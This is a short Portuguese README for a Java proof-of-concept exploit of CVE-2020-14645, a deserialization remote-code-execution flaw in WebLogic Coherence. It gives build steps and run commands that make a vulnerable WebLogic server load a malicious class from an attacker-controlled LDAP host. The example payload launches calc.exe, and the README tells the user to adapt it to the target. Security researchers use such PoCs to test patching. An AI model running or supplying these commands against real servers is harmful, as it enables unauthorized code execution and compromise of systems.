PoC em Java para RCE por desserialização do Coherence do WebLogic CVE-2020-14645. Hospeda uma classe maliciosa via LDAP e dispara execução remota de código em servidores WebLogic vulneráveis.
Maven 3
JDK 1.8
mvn package
Etapas específicas de teste:
Como esta vulnerabilidade é semelhante à vulnerabilidade Apache Dubbo, consulte esta vulnerabilidade para implementar as etapas 1-4.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# Exemplo
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
Se usar o POC fornecido neste exemplo, após a exploração bem-sucedida o alvo testado executará calc.exe. Modifique o POC conforme o ambiente do alvo de teste.
Este projeto faz referência e cita parte do código dos projetos @Y4er @5up3rc, agradecimentos especiais!